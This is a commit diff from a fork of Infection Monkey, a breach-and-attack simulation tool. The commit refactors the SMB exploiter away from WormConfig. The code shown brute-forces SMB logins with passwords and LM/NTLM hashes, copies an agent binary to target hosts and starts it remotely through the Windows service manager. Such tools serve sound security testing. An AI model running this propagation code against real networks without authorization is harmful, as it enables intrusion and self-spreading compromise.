forked from p15670423/monkey
Agent: Remove dependency on WormConfig from SmbExploiter
This commit is contained in:
Mike Salvatore
parent
415f3e6468
commit
6fda2691e5
|
|
@ -4,12 +4,13 @@ from impacket.dcerpc.v5 import scmr, transport
|
||||||
|
|
||||||
from common.utils.attack_utils import ScanStatus, UsageEnum
|
from common.utils.attack_utils import ScanStatus, UsageEnum
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||||
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
|
from infection_monkey.exploit.tools.helpers import get_agent_dest_path
|
||||||
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
||||||
from infection_monkey.model import DROPPER_CMDLINE_DETACHED_WINDOWS, MONKEY_CMDLINE_DETACHED_WINDOWS
|
from infection_monkey.model import DROPPER_CMDLINE_DETACHED_WINDOWS, MONKEY_CMDLINE_DETACHED_WINDOWS
|
||||||
from infection_monkey.network.tools import check_tcp_port
|
from infection_monkey.network.tools import check_tcp_port
|
||||||
from infection_monkey.network_scanning.smbfinger import SMBFinger
|
from infection_monkey.network_scanning.smbfinger import SMBFinger
|
||||||
from infection_monkey.telemetry.attack.t1035_telem import T1035Telem
|
from infection_monkey.telemetry.attack.t1035_telem import T1035Telem
|
||||||
|
from infection_monkey.utils.brute_force import generate_brute_force_combinations
|
||||||
from infection_monkey.utils.commands import build_monkey_commandline
|
from infection_monkey.utils.commands import build_monkey_commandline
|
||||||
|
|
||||||
logger = getLogger(__name__)
|
logger = getLogger(__name__)
|
||||||
|
|
@ -45,14 +46,9 @@ class SmbExploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
src_path = get_target_monkey(self.host)
|
agent_binary = self.agent_repository.get_agent_binary(self.host.os["type"])
|
||||||
|
dest_path = get_agent_dest_path(self.host, self.options)
|
||||||
if not src_path:
|
creds = generate_brute_force_combinations(self.options["credentials"])
|
||||||
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
|
||||||
return False
|
|
||||||
|
|
||||||
# TODO use infectionmonkey.utils.brute_force
|
|
||||||
creds = self._config.get_exploit_user_password_or_hash_product()
|
|
||||||
|
|
||||||
exploited = False
|
exploited = False
|
||||||
for user, password, lm_hash, ntlm_hash in creds:
|
for user, password, lm_hash, ntlm_hash in creds:
|
||||||
|
|
@ -60,24 +56,18 @@ class SmbExploiter(HostExploiter):
|
||||||
# copy the file remotely using SMB
|
# copy the file remotely using SMB
|
||||||
remote_full_path = SmbTools.copy_file(
|
remote_full_path = SmbTools.copy_file(
|
||||||
self.host,
|
self.host,
|
||||||
src_path,
|
agent_binary,
|
||||||
self._config.dropper_target_path_win_32,
|
dest_path,
|
||||||
user,
|
user,
|
||||||
password,
|
password,
|
||||||
lm_hash,
|
lm_hash,
|
||||||
ntlm_hash,
|
ntlm_hash,
|
||||||
self._config.smb_download_timeout,
|
self.options["smb_download_timeout"],
|
||||||
)
|
)
|
||||||
|
|
||||||
if remote_full_path is not None:
|
if remote_full_path is not None:
|
||||||
logger.debug(
|
logger.info(
|
||||||
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) "
|
f'Successfully logged in to {self.host.ip_addr} using user "{user}"'
|
||||||
"%s : (SHA-512) %s)",
|
|
||||||
self.host,
|
|
||||||
user,
|
|
||||||
self._config.hash_sensitive_data(password),
|
|
||||||
self._config.hash_sensitive_data(lm_hash),
|
|
||||||
self._config.hash_sensitive_data(ntlm_hash),
|
|
||||||
)
|
)
|
||||||
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
||||||
self.add_vuln_port(
|
self.add_vuln_port(
|
||||||
|
|
@ -95,15 +85,8 @@ class SmbExploiter(HostExploiter):
|
||||||
|
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
logger.debug(
|
logger.debug(
|
||||||
"Exception when trying to copy file using SMB to %r with user:"
|
"Error when trying to copy file using SMB to {self.host.ip_addr} with user "
|
||||||
" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
|
f'"{user}":{exc}'
|
||||||
"SHA-512): %s: (%s)",
|
|
||||||
self.host,
|
|
||||||
user,
|
|
||||||
self._config.hash_sensitive_data(password),
|
|
||||||
self._config.hash_sensitive_data(lm_hash),
|
|
||||||
self._config.hash_sensitive_data(ntlm_hash),
|
|
||||||
exc,
|
|
||||||
)
|
)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
|
@ -112,18 +95,18 @@ class SmbExploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
# execute the remote dropper in case the path isn't final
|
# execute the remote dropper in case the path isn't final
|
||||||
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
if remote_full_path.lower() != dest_path.lower():
|
||||||
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
|
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
|
||||||
"dropper_path": remote_full_path
|
"dropper_path": remote_full_path
|
||||||
} + build_monkey_commandline(
|
} + build_monkey_commandline(
|
||||||
self.host,
|
self.host,
|
||||||
get_monkey_depth() - 1,
|
self.current_depth - 1,
|
||||||
self._config.dropper_target_path_win_32,
|
dest_path,
|
||||||
)
|
)
|
||||||
else:
|
else:
|
||||||
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
|
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
|
||||||
"monkey_path": remote_full_path
|
"monkey_path": remote_full_path
|
||||||
} + build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
} + build_monkey_commandline(self.host, self.current_depth - 1)
|
||||||
|
|
||||||
smb_conn = False
|
smb_conn = False
|
||||||
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
||||||
|
|
@ -153,6 +136,8 @@ class SmbExploiter(HostExploiter):
|
||||||
|
|
||||||
if not smb_conn:
|
if not smb_conn:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
# TODO: We DO want to deal with timeouts
|
||||||
# We don't wanna deal with timeouts from now on.
|
# We don't wanna deal with timeouts from now on.
|
||||||
smb_conn.setTimeout(100000)
|
smb_conn.setTimeout(100000)
|
||||||
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
|
||||||
|
|
|
||||||
|
|
@ -11,6 +11,7 @@ from common.utils.attack_utils import ScanStatus
|
||||||
from infection_monkey.config import Configuration
|
from infection_monkey.config import Configuration
|
||||||
from infection_monkey.network.tools import get_interface_to_target
|
from infection_monkey.network.tools import get_interface_to_target
|
||||||
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
||||||
|
from infection_monkey.utils.brute_force import get_credential_string
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
@ -28,6 +29,8 @@ class SmbTools(object):
|
||||||
timeout=60,
|
timeout=60,
|
||||||
):
|
):
|
||||||
# TODO assess the 60 second timeout
|
# TODO assess the 60 second timeout
|
||||||
|
creds_for_log = get_credential_string([username, password, lm_hash, ntlm_hash])
|
||||||
|
logger.debug(f"Attempting to copy an agent binary to {host} using SMB with {creds_for_log}")
|
||||||
|
|
||||||
smb, dialect = SmbTools.new_smb_connection(
|
smb, dialect = SmbTools.new_smb_connection(
|
||||||
host, username, password, lm_hash, ntlm_hash, timeout
|
host, username, password, lm_hash, ntlm_hash, timeout
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue